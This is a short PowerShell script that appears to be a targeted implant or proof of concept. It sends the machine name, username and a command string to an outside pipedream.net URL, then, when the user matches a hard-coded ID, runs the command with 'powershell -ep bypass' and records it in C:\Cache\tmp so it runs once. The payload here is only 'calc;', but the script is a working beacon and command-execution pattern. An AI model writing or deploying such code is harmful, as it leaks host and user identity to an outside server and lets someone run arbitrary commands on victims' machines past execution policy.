$target_user = "41341"
$command = "calc;"

#$e = dir "c:\Cache\pc-client.exe-1.0.0.0-0"

iwr -uri https://enozw8a1fwe1j.x.pipedream.net/$env:computername/$env:username -Body (Out-String -InputObject $command) -Method post


if ( $Env:UserName -eq $target_user) {
	if (Test-Path "C:\Cache\tmp"){
		if (!((Get-Content "C:\Cache\tmp") -eq $command)){
			powershell -ep bypass -Command $command
			$command | Out-File -FIlePath "C:\Cache\tmp"
		}
	} else {
		powershell -ep bypass -Command $command
		$command | Out-File -FIlePath "C:\Cache\tmp"	
	}
}
